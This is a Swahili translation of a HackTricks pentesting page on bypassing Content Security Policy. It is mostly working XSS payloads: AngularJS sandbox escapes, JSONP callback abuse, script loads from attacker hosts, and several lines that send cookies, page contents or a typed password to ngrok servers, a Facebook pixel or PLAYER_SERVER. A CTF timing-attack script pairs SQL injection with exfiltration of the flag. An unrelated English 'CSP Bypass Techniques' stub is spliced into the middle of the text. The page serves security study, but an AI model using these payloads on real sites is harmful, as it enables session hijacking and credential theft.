.. | ||
csp-bypass-self-+-unsafe-inline-with-iframes.md | ||
README.md |
Kizuizi cha Usalama wa Yaliyomo (CSP) Kupitisha
Jifunze kuhusu kuhacki AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs za kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kuhacki kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Jiunge na HackenProof Discord server ili kuwasiliana na wahacki wenye uzoefu na wawindaji wa zawadi za bug!
Machapisho ya Kuhacki
Shiriki na yaliyomo yanayochimba kina katika msisimko na changamoto za kuhacki
Taarifa za Kuhacki za Muda Halisi
Kaa sawa na ulimwengu wa kuhacki wenye kasi kupitia habari za muda halisi na ufahamu
Matangazo ya Karibuni
Baki mwelekezwa na zawadi mpya za bug zinazoanzishwa na sasisho muhimu za jukwaa
Jiunge nasi kwenye Discord na anza kushirikiana na wahacki bora leo!
Ni Nini CSP
Kizuizi cha Usalama wa Yaliyomo (CSP) kinatambuliwa kama teknolojia ya kivinjari, iliyolenga hasa kulinda dhidi ya mashambulizi kama vile udukuzi wa tovuti nyingine (XSS). Kinafanya kazi kwa kufafanua na kuelezea njia na vyanzo ambavyo rasilimali zinaweza kupakiwa kwa usalama na kivinjari. Rasilimali hizi zinajumuisha vitu mbalimbali kama picha, fremu, na JavaScript. Kwa mfano, sera inaweza kuruhusu kupakia na kutekeleza rasilimali kutoka kwa kikoa kile kile (self), ikiwa ni pamoja na rasilimali za ndani na utekelezaji wa nambari ya mstari kupitia kazi kama vile eval
, setTimeout
, au setInterval
.
Utekelezaji wa CSP unafanywa kupitia vichwa vya majibu au kwa kuingiza vipengele vya meta kwenye ukurasa wa HTML. Kufuatia sera hii, vivinjari hutekeleza masharti haya kwa ufanisi na kuzuia mara moja uvunjaji wowote uliogunduliwa.
- Imetekelezwa kupitia kichwa cha majibu:
Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';
- Imetekelezwa kupitia lebo ya meta:
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
Vichwa
CSP inaweza kutekelezwa au kufuatiliwa kwa kutumia vichwa hivi:
Content-Security-Policy
: Inatekeleza CSP; kivinjari kinazuia uvunjaji wowote.Content-Security-Policy-Report-Only
: Hutumika kwa ufuatiliaji; inaripoti uvunjaji bila kuwazuia. Ni bora kwa ajili ya majaribio katika mazingira ya awali ya uzalishaji.
Kutambua Rasilmali
CSP inazuia asili za kupakia yaliyo hai na yaliyo pasipo hai, ikidhibiti mambo kama utekelezaji wa JavaScript ya ndani na matumizi ya eval()
. Sera ya mfano ni:
default-src 'none';
img-src 'self';
script-src 'self' https://code.jquery.com;
style-src 'self';
report-uri /cspreport
font-src 'self' https://addons.cdn.mozilla.net;
frame-src 'self' https://ic.paypal.com https://paypal.com;
media-src https://videos.cdn.mozilla.net;
object-src 'none';
Maelekezo
- script-src: Inaruhusu vyanzo maalum vya JavaScript, ikiwa ni pamoja na URLs, scripts za ndani, na scripts zinazosababishwa na wakati wa matukio au XSLT stylesheets.
- default-src: Inaweka sera ya msingi kwa kupata rasilimali wakati maelekezo maalum ya kupata hayapo.
- child-src: Inabainisha rasilimali zinazoruhusiwa kwa wafanyakazi wa mtandao na maudhui ya fremu zilizojumuishwa.
- connect-src: Inazuia URLs ambazo zinaweza kupakia kutumia interfaces kama fetch, WebSocket, XMLHttpRequest.
- frame-src: Inazuia URLs kwa fremu.
- frame-ancestors: Inabainisha ni vyanzo vipi vinaweza kujumuisha ukurasa wa sasa, inayotumika kwa vipengele kama
<frame>
,<iframe>
,<object>
,<embed>
, na<applet>
. - img-src: Inadefini vyanzo vilivyoidhinishwa kwa ajili ya picha.
- font-src: Inabainisha vyanzo halali kwa fonts zinazopakiwa kwa kutumia
@font-face
. - manifest-src: Inadefini vyanzo vilivyoidhinishwa vya faili za maandishi ya maombi.
- media-src: Inadefini vyanzo vilivyoidhinishwa kwa kupakia vitu vya media.
- object-src: Inabainisha vyanzo vilivyoidhinishwa kwa vipengele vya
<object>
,<embed>
, na<applet>
. - base-uri: Inabainisha URLs zilizoruhusiwa kwa kupakia kutumia vipengele vya
<base>
. - form-action: Inaorodhesha vituo halali vya kutuma fomu.
- plugin-types: Inazuia aina za mime ambazo ukurasa unaweza kuita.
- upgrade-insecure-requests: Inaagiza vivinjari kubadilisha URLs za HTTP kuwa HTTPS.
- sandbox: Inatumia vizuizi sawa na sifa ya sandbox ya
<iframe>
. - report-to: Inabainisha kikundi ambacho ripoti itatumwa ikiwa sera itavunjwa.
- worker-src: Inabainisha vyanzo halali kwa Worker, SharedWorker, au scripts za ServiceWorker.
- prefetch-src: Inabainisha vyanzo halali kwa rasilimali zitakazopakuliwa au kuhifadhiwa mapema.
- navigate-to: Inazuia URLs ambazo waraka unaweza kuhamia kwa njia yoyote (a, fomu, window.location, window.open, n.k.)
Vyanzo
*
: Inaruhusu URLs zote isipokuwa zile zenye mifumo yadata:
,blob:
,filesystem:
.'self'
: Inaruhusu kupakia kutoka kwa kikoa kile kile.'data'
: Inaruhusu rasilimali kupakiwa kupitia mfumo wa data (k.m., picha zilizooanishwa kwa Base64).'none'
: Inazuia kupakia kutoka vyanzo vyovyote.'unsafe-eval'
: Inaruhusu matumizi yaeval()
na mbinu zinazofanana, sio kupendekezwa kwa sababu za usalama.'unsafe-hashes'
: Inawezesha wakati maalum wa matukio ya ndani.'unsafe-inline'
: Inaruhusu matumizi ya rasilimali za ndani kama<script>
au<style>
, sio kupendekezwa kwa sababu za usalama.'nonce'
: Orodha nyeupe kwa scripts za ndani maalum zikitumia nonce ya kriptografia (namba inayotumiwa mara moja).- Ikiwa una utekelezaji mdogo wa JS, ni rahisi kupata nonce iliyotumiwa ndani ya ukurasa na
doc.defaultView.top.document.querySelector("[nonce]")
na kisha kutumia tena kuiweka script yenye nia mbaya (ikiwa strict-dynamic inatumika, chanzo chochote kilichoruhusiwa kinaweza kupakia vyanzo vipya hivyo hii haikuhitajiki), kama ifuatavyo:
Pakia script ukitumia nonce
```html ```'sha256-<hash>'
: Weupe scripts na hash maalum ya sha256.'strict-dynamic'
: Inaruhusu kupakia scripts kutoka chanzo chochote ikiwa imewekwa kwenye orodha nyeupe kwa njia ya nonce au hash.'host'
: Inabainisha mwenyeji maalum, kama vileexample.com
.https:
: Inazuia URLs zinazotumia HTTPS tu.blob:
: Inaruhusu rasilimali kupakia kutoka kwenye URL za Blob (k.mf., URL za Blob zilizoundwa kupitia JavaScript).filesystem:
: Inaruhusu rasilimali kupakia kutoka kwenye mfumo wa faili.'report-sample'
: Inajumuisha sampuli ya namna ya kanuni inayokiuka katika ripoti ya ukiukaji (inayofaa kwa ajili ya kutatua hitilafu).'strict-origin'
: Kama 'self' lakini inahakikisha kiwango cha usalama wa itifaki ya vyanzo vinavyolingana na hati (vyanzo salama pekee vinaweza kupakia rasilimali kutoka vyanzo salama).'strict-origin-when-cross-origin'
: Inatuma URLs kamili wakati wa kufanya maombi ya asili lakini inatuma asili pekee wakati ombi ni la msalaba-asili.'unsafe-allow-redirects'
: Inaruhusu rasilimali kupakia ambazo zitaelekeza mara moja kwenye rasilimali nyingine. Siyo kupendekezwa kwani inadhoofisha usalama.
Sheria za CSP Zisizo Salama
'unsafe-inline'
Content-Security-Policy: script-src https://google.com 'unsafe-inline';
Payload inayofanya kazi: "/><script>alert(1);</script>
self + 'unsafe-inline' kupitia Iframes
{% content-ref url="csp-bypass-self-+-unsafe-inline-with-iframes.md" %} csp-bypass-self-+-unsafe-inline-with-iframes.md {% endcontent-ref %}
'unsafe-eval'
Content-Security-Policy: script-src https://google.com 'unsafe-eval';
Payload inayofanya kazi:
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
strict-dynamic
Ikiwa kwa namna fulani unaweza kufanya msimbo wa JS ulioruhusiwa uunde lebo mpya ya script katika DOM na msimbo wako wa JS, kwa sababu script iliyoruhusiwa inaunda hiyo, lebo mpya ya script itaruhusiwa kutekelezwa.
Kipeperushi (*)
Content-Security-Policy: script-src 'self' https://google.com https: data *;
Payload inayofanya kazi:
"/>'><script src=https://attacker-website.com/evil.js></script>
"/>'><script src=data:text/javascript,alert(1337)></script>
Ukosefu wa object-src na default-src
{% hint style="danger" %} Inaonekana kama hii sio tena inafanya kazi {% endhint %}
Content-Security-Policy: script-src 'self' ;
Mizigo inayofanya kazi:
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>
Kupakia Faili + 'self'
Content-Security-Policy: script-src 'self'; object-src 'none' ;
Ikiwa unaweza kupakia faili ya JS unaweza kuzidi CSP hii:
Mzigo unafanya kazi:
"/>'><script src="/uploads/picture.png.js"></script>
Hata hivyo, ni uwezekano mkubwa kwamba server ina thibitisha faili iliyopakiwa na itaruhusu tu kupakia aina fulani za faili.
Zaidi ya hayo, hata kama unaweza kupakia msimbo wa JS ndani ya faili ukitumia kipanuzi kinachokubaliwa na server (kama: script.png) hii haitoshi kwa sababu baadhi ya server kama server ya apache huchagua aina ya MIME ya faili kulingana na kipanuzi na vivinjari kama Chrome kukataa kutekeleza msimbo wa Javascript ndani ya kitu ambacho kinapaswa kuwa picha. "Kwa bahati mbaya", kuna makosa. Kwa mfano, kutoka kwenye CTF nilijifunza kwamba Apache haifahamu kipanuzi cha .wave, hivyo haipatii na aina ya MIME kama audio/*.
Kutoka hapa, ikiwa unapata XSS na upakiaji wa faili, na unafanikiwa kupata kipanuzi kilichochanganywa, unaweza kujaribu kupakia faili yenye kipanuzi hicho na Maudhui ya script. Au, ikiwa server inathibitisha muundo sahihi wa faili iliyopakiwa, tengeneza polyglot (baadhi ya mifano ya polyglot hapa).
Form-action
Ikiwa haiwezekani kuingiza JS, bado unaweza kujaribu kuvuja kwa mfano nywila kwa kuingiza hatua ya fomu (na labda kutarajia mameneja wa nywila kujaza nywila moja kwa moja). Unaweza kupata mfano katika ripoti hii. Pia, kumbuka kwamba default-src
haifuniki hatua za fomu.
Vielekezi vya Wahusika Wengine + ('unsafe-eval')
{% hint style="warning" %}
Kwa baadhi ya mzigo ufuatao unsafe-eval
hata haifai.
{% endhint %}
Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
Pakia toleo lenye udhaifu la angular na tekeleza JS ya kiholela:
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
"><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
"><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>
With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-author-writeup/
<script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js></script>
<iframe/ng-app/ng-csp/srcdoc="
<script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.0/angular.js>
</script>
<img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
>
Payloads zinazotumia Angular + maktaba yenye kazi zinazorudisha kitu cha window
(angalia chapisho hili):
{% hint style="info" %}
Chapisho linaonyesha kwamba unaweza kupakia maktaba zote kutoka cdn.cloudflare.com
(au maktaba zingine zilizoruhusiwa za JS), tekeleza kazi zote zilizoongezwa kutoka kila maktaba, na angalia kazi zipi kutoka maktaba zipi zinarudisha kitu cha window
.
{% endhint %}
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
<div ng-app ng-csp>
{{$on.curry.call().alert(1)}}
{{[].empty.call().alert([].empty.call().document.domain)}}
{{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
<div ng-app ng-csp>
{{$on.curry.call().alert('xss')}}
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/mootools/1.6.0/mootools-core.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
<div ng-app ng-csp>
{{[].erase.call().alert('xss')}}
</div>
Angular XSS kutoka kwa jina la darasa:
<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
</div>
Kudhuru kanuni ya JS ya google recaptcha
Kulingana na hii CTF andika unaweza kutumia https://www.google.com/recaptcha/ ndani ya CSP kutekeleza kanuni ya JS ya kupita kwenye CSP:
<div
ng-controller="CarouselController as c"
ng-init="c.init()"
>
[[c.element.ownerDocument.defaultView.parent.location="http://google.com?"+c.element.ownerDocument.cookie]]
<div carousel><div slides></div></div>
<script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
Zaidi payloads kutoka kwenye andiko hili:
<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script>
<!-- Trigger alert -->
<img src=x ng-on-error='$event.target.ownerDocument.defaultView.alert(1)'>
<!-- Reuse nonce -->
<img src=x ng-on-error='
doc=$event.target.ownerDocument;
a=doc.defaultView.top.document.querySelector("[nonce]");
b=doc.createElement("script");
b.src="//example.com/evil.js";
b.nonce=a.nonce; doc.body.appendChild(b)'>
Kutumia www.google.com kwa ajili ya kurejeleza wazi
URL ifuatayo inarejelea kwenye example.com (kutoka hapa):
https://www.google.com/amp/s/example.com/
Vipindi vya Tatu vya Nje + JSONP
Inawezekana kutumia Google Apps Script kupokea habari kwenye ukurasa ndani ya script.google.com. Kama ilivyo fanywa katika ripoti hii.
Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
Katika hali kama hii ambapo script-src
imewekwa kuwa self
na kikoa fulani ambacho kimeorodheshwa kwenye orodha nyeupe inaweza kukiukwa kwa kutumia JSONP. Vituo vya JSONP huruhusu njia za kurejelea zisizo salama ambazo huruhusu mshambuliaji kutekeleza XSS, mzigo wa kazi:
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
https://www.youtube.com/oembed?callback=alert;
<script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script>
JSONBee inaendelea kutumia JSONP endpoints kwa kuzidi kwa CSP kwenye tovuti tofauti.
Ugunduzi sawa utatokea ikiwa endpoint iliyosadikika ina Open Redirect kwa sababu ikiwa endpoint ya awali inasadikika, maelekezo yanasadikika.
Mabaya ya Tatu
Kama ilivyoelezwa katika chapisho lifuatalo, kuna uwanja wengi wa tatu, ambao huenda ukaruhusiwa mahali fulani katika CSP, unaweza kutumika kwa kuchukua data au kutekeleza nambari ya JavaScript. Baadhi ya watoa huduma wa tatu hawa ni:
Entiti | Uwanja Ulioruhusiwa | Uwezo |
---|---|---|
www.facebook.com, *.facebook.com | Exfil | |
Hotjar | *.hotjar.com, ask.hotjar.io | Exfil |
Jsdelivr | *.jsdelivr.com, cdn.jsdelivr.net | Exec |
Amazon CloudFront | *.cloudfront.net | Exfil, Exec |
Amazon AWS | *.amazonaws.com | Exfil, Exec |
Azure Websites | *.azurewebsites.net, *.azurestaticapps.net | Exfil, Exec |
Salesforce Heroku | *.herokuapp.com | Exfil, Exec |
Google Firebase | *.firebaseapp.com | Exfil, Exec |
Ikiwa unapata uwanja wowote ulioruhusiwa katika CSP ya lengo lako, kuna uwezekano kwamba unaweza kuzidi CSP kwa kusajili kwenye huduma ya tatu na, au kuchukua data kwenda kwenye huduma hiyo au kutekeleza nambari.
Kwa mfano, ikiwa unapata CSP ifuatayo:
Content-Security-Policy: default-src 'self’ www.facebook.com;
CSP Bypass Techniques
Introduction
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, such as Cross Site Scripting (XSS) and data injection attacks. However, there are ways to bypass CSP protections and execute malicious code on a target website.
In this section, we will explore various techniques to bypass CSP and achieve successful exploitation.
Table of Contents
- Bypassing CSP using
unsafe-inline
- Bypassing CSP using
unsafe-eval
- Bypassing CSP using Data URI
- Bypassing CSP using Trusted Types
Stay tuned for more updates on CSP bypass techniques!
Content-Security-Policy: connect-src www.facebook.com;
Unapaswa kuweza kuchukua data, kama ilivyokuwa daima imefanywa na Google Analytics/Google Tag Manager. Katika kesi hii, unafuata hatua hizi kuu:
- Unda akaunti ya Facebook Developer hapa.
- Unda programu mpya ya "Facebook Login" na chagua "Tovuti".
- Nenda kwa "Mipangilio -> Msingi" na pata "Kitambulisho cha Programu"
- Kwenye tovuti lengwa unayotaka kuchukua data kutoka, unaweza kuchukua data moja kwa moja kwa kutumia kifaa cha Facebook SDK "fbq" kupitia "tukio la desturi" na mzigo wa data.
- Nenda kwa "Meneja wa Matukio ya Programu" yako na chagua programu uliyounda (kumbuka meneja wa matukio unaweza kupatikana kwenye URL kama hii: https://www.facebook.com/events_manager2/list/pixel/[app-id]/test_events
- Chagua kichupo "Matukio ya Majaribio" kuona matukio yanayotumwa na tovuti "yako".
Kisha, upande wa mwathiriwa, tekeleza nambari ifuatayo kuanzisha pikseli ya kufuatilia ya Facebook ili ielekeze kwenye akaunti ya Facebook ya muundaji wa mshambuliaji na kutuma tukio la desturi kama hili:
fbq('init', '1279785999289471'); // this number should be the App ID of the attacker's Meta/Facebook account
fbq('trackCustom', 'My-Custom-Event',{
data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"
});
Kuhusu uwanja wa tatu saba uliotajwa katika jedwali lililopita, kuna njia nyingine nyingi unazoweza kuzitumia vibaya. Tazama chapisho la blogi hapo awali kwa maelezo zaidi kuhusu matumizi mabaya ya uwanja wa tatu.
Kupitia RPO (Relative Path Overwrite)
Mbali na mwelekeo uliotajwa hapo juu wa kuzidisha vikwazo vya njia, kuna mbinu nyingine inayoitwa Relative Path Overwrite (RPO) inayoweza kutumika kwenye baadhi ya seva.
Kwa mfano, ikiwa CSP inaruhusu njia https://example.com/scripts/react/
, inaweza kuzidishwa kama ifuatavyo:
<script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>
Kivinjari itaingiza hatimaye https://example.com/scripts/angular/angular.js
.
Hii inafanya kazi kwa sababu kwa kivinjari, unapakia faili iliyoitwa ..%2fangular%2fangular.js
iliyoko chini ya https://example.com/scripts/react/
, ambayo inazingatia CSP.
Kwa hivyo, wataidecode, wakiiomba kwa ufanisi https://example.com/scripts/react/../angular/angular.js
, ambayo ni sawa na https://example.com/scripts/angular/angular.js
.
Kwa kutumia hitilafu hii katika tafsiri ya URL kati ya kivinjari na seva, sheria za njia zinaweza kukiukwa.
Suluhisho ni kutotambua %2f
kama /
upande wa seva, kuhakikisha tafsiri thabiti kati ya kivinjari na seva ili kuepuka shida hii.
Mfano Mtandaoni: https://jsbin.com/werevijewa/edit?html,output
Utekelezaji wa JS wa Iframes
{% content-ref url="../xss-cross-site-scripting/iframes-in-xss-and-csp.md" %} iframes-in-xss-and-csp.md {% endcontent-ref %}
base-uri iliyopotea
Ikiwa mwelekeo wa base-uri hauko, unaweza kutumia kufanya injini ya alama ya kuteleza.
Zaidi ya hayo, ikiwa ukurasa unapakia script kwa kutumia njia ya kihusishi (kama <script src="/js/app.js">
) ukitumia Nonce, unaweza kutumia tag ya msingi kufanya iweze kupakia script kutoka kwenye seva yako mwenyewe kufikia XSS.
Ikiwa ukurasa unaopatikana una httpS, tumia url ya httpS kwenye msingi.
<base href="https://www.attacker.com/">
Matukio ya AngularJS
Sera maalum inayojulikana kama Sera ya Usalama wa Yaliyomo (CSP) inaweza kuzuia matukio ya JavaScript. Walakini, AngularJS inaleta matukio ya desturi kama mbadala. Ndani ya tukio, AngularJS hutoa kitu maalum $event
, kirejeleo kwa kitu cha matukio ya kivinjari asilia. Kitu hiki cha $event
kinaweza kutumika kukiuka CSP. Hasa, katika Chrome, kitu cha $event/event
kina sifa ya path
, ikishikilia safu ya vitu iliyohusishwa katika mnyororo wa utekelezaji wa tukio, na kitu cha window
kawaida kikiwa mwishoni. Muundo huu ni muhimu kwa mikakati ya kutoroka kwenye sanduku la mchanga.
Kwa kuongoza safu hii kwa kichujio cha orderBy
, inawezekana kuipitia, kutumia kipengee cha mwisho (kitu cha window
) kuzindua kazi ya ulimwengu kama vile alert()
. Msimbo uliodhihirishwa hapa chini unaelezea mchakato huu:
<input%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27>#x
?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x
Hii sehemu inaonyesha matumizi ya agizo la ng-focus
kuzindua tukio, kutumia $event.path|orderBy
kubadilisha safu ya path
, na kutumia kitu cha window
kutekeleza kazi ya alert()
, hivyo kufunua document.cookie
.
Pata njia zingine za kuzidisha Angular katika https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
AngularJS na kikoa kilichoorodheshwa kwenye orodha nyeupe
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
Mbinu ya Kupitisha Sera ya Usalama wa Yaliyomo (CSP)
Sera ya CSP inayoorodhesha vikoa kwa upakiaji wa script katika programu ya Angular JS inaweza kupitishwa kupitia wito wa kazi za kurudi na baadhi ya mbinu zilizodhaifu. Taarifa zaidi kuhusu mbinu hii inapatikana kwenye mwongozo kamili uliopo kwenye ghala la git hapa.
Mizigo inayofanya kazi:
<script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
<!-- no longer working -->
<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">
Other JSONP arbitrary execution endpoints can be found in hapa (baadhi yao ilifutwa au kusahihishwa)
Kupitisha kupitia Uelekezaji
Nini hutokea wakati CSP inakutana na uelekezaji wa upande wa seva? Ikiwa uelekezaji unapelekea kwenye asili tofauti ambayo haikubaliki, bado itashindwa.
Hata hivyo, kulingana na maelezo katika CSP spec 4.2.2.3. Paths and Redirects, ikiwa uelekezaji unapelekea kwenye njia tofauti, inaweza kupitisha vizuizi vya awali.
Hapa kuna mfano:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="script-src http://localhost:5555 https://www.google.com/a/b/c/d">
</head>
<body>
<div id=userContent>
<script src="https://https://www.google.com/test"></script>
<script src="https://https://www.google.com/a/test"></script>
<script src="http://localhost:5555/301"></script>
</div>
</body>
</html>
If CSP is set to https://www.google.com/a/b/c/d
, tangu njia ichukuliwe kwa uzito, scripts zote za /test
na /a/test
zitazuiliwa na CSP.
Hata hivyo, http://localhost:5555/301
ya mwisho itakuwa inaelekezwa upya kwenye upande wa seva kwenda https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//
. Kwa kuwa ni upyaishaji, njia haizingatiwi, na script inaweza kupakia, hivyo kukiuka kizuizi cha njia.
Kwa upyaishaji huu, hata kama njia imeelezwa kikamilifu, bado itapuuzwa.
Hivyo basi, suluhisho bora ni kuhakikisha tovuti haina udhaifu wowote wa upyaishaji wazi na kwamba hakuna uwanja wowote ambao unaweza kutumiwa katika sheria za CSP.
Kupuuza CSP na alama za kuteleza
Soma hapa kujua zaidi.
'unsafe-inline'; img-src *; kupitia XSS
default-src 'self' 'unsafe-inline'; img-src *;
'unsafe-inline'
inamaanisha unaweza kutekeleza script yoyote ndani ya code (XSS inaweza kutekeleza code) na img-src *
inamaanisha unaweza kutumia kwenye ukurasa picha yoyote kutoka kwenye chanzo chochote.
Unaweza kukiuka CSP hii kwa kuchukua data kupitia picha (katika kesi hii XSS inatumia CSRF ambapo ukurasa unaopatikana na bot una SQLi, na kutoa bendera kupitia picha):
<script>fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new Image().src='http://PLAYER_SERVER/?'+_)</script>
From: https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle
Ungekuwa unaweza pia kutumia usanidi huu kwa kupakia kificho cha javascript kilichowekwa ndani ya picha. Kwa mfano, ikiwa ukurasa unaruhusu kupakia picha kutoka Twitter. Ungekuwa unda picha maalum, ipakie kwenye Twitter na kutumia "unsafe-inline" kutekeleza kificho cha JS (kama XSS ya kawaida) ambacho kitapakia picha, kutoa JS kutoka kwake na kutekeleza hiyo: https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/
Kwa Wafanyikazi wa Huduma
Kazi za wafanyikazi wa huduma importScripts
hazina kikomo na CSP:
{% content-ref url="../xss-cross-site-scripting/abusing-service-workers.md" %} abusing-service-workers.md {% endcontent-ref %}
Uingizaji wa Sera
Utafiti: https://portswigger.net/research/bypassing-csp-with-policy-injection
Chrome
Ikiwa parameta iliyotumwa na wewe inawekwa ndani ya tamko la sera, basi unaweza badilisha sera kwa njia fulani ambayo inafanya isiwe na maana. Unaweza kuruhusu script 'unsafe-inline' na mojawapo ya njia hizi za kuvuka:
script-src-elem *; script-src-attr *
script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
Kwa sababu agizo hili litakua kubadilisha maagizo ya script-src yaliyopo.
Unaweza kupata mfano hapa: http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E
Edge
Katika Edge ni rahisi sana. Ikiwa unaweza kuongeza hili tu kwenye CSP: ;_
Edge ita ondoa kabisa sera.
Mfano: http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E
img-src *; kupitia XSS (iframe) - Shambulio la Wakati
Tambua ukosefu wa agizo 'unsafe-inline'
Wakati huu unaweza kufanya muhanga apakie ukurasa katika udhibiti wako kupitia XSS na <iframe
. Wakati huu utafanya muhanga kupata upatikanaji wa ukurasa kutoka mahali unapotaka kutoa habari (CSRF). Huwezi kupata maudhui ya ukurasa, lakini kama kwa njia fulani unaweza kudhibiti muda ambao ukurasa unahitaji kupakia unaweza kutoa habari unayohitaji.
Wakati huu bendera itaondolewa, kila wakati herufi inatabiriwa kwa usahihi kupitia SQLi majibu yanachukua muda zaidi kutokana na kazi ya kulala. Kisha, utaweza kutoa bendera:
<!--code from https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle -->
<iframe name=f id=g></iframe> // The bot will load an URL with the payload
<script>
let host = "http://x-oracle-v1.nn9ed.ka0labs.org";
function gen(x) {
x = escape(x.replace(/_/g, '\\_'));
return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag%20like%20'${x}%25'and%201=sleep(0.1)%23`;
}
function gen2(x) {
x = escape(x);
return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag='${x}'and%201=sleep(0.1)%23`;
}
async function query(word, end=false) {
let h = performance.now();
f.location = (end ? gen2(word) : gen(word));
await new Promise(r => {
g.onload = r;
});
let diff = performance.now() - h;
return diff > 300;
}
let alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789'.split('');
let postfix = '}'
async function run() {
let prefix = 'nn9ed{';
while (true) {
let i = 0;
for (i;i<alphabet.length;i++) {
let c = alphabet[i];
let t = await query(prefix+c); // Check what chars returns TRUE or FALSE
console.log(prefix, c, t);
if (t) {
console.log('FOUND!')
prefix += c;
break;
}
}
if (i==alphabet.length) {
console.log('missing chars');
break;
}
let t = await query(prefix+'}', true);
if (t) {
prefix += '}';
break;
}
}
new Image().src = 'http://PLAYER_SERVER/?' + prefix; //Exfiltrate the flag
console.log(prefix);
}
run();
</script>
Kupitia Bookmarklets
Shambulizi hili lingehusisha uhandisi wa kijamii ambapo mkaidi anamshawishi mtumiaji kuhamisha na kuachia kiungo juu ya bookmarklet ya kivinjari. Bookmarklet hii ingejumuisha msimbo wa javascript wenye nia mbaya ambao unapohamishwa au bonyezwa ungeendeshwa katika muktadha wa dirisha la wavuti la sasa, kipuuzia CSP na kuruhusu kuiba taarifa nyeti kama vile vidakuzi au vitufe.
Kwa maelezo zaidi angalia ripoti ya asili hapa.
Kupitisha CSP kwa kuzuia CSP
Katika hii CTF writeup, CSP inapitishwa kwa kuingiza ndani ya fremu iliyoruhusiwa CSP inayozuia zaidi ambayo ilikataza kupakia faili maalum ya JS ambayo, kisha, kupitia uchafuzi wa protini au dom clobbering iliruhusu kutumia hati tofauti kupakia hati ya aina yoyote.
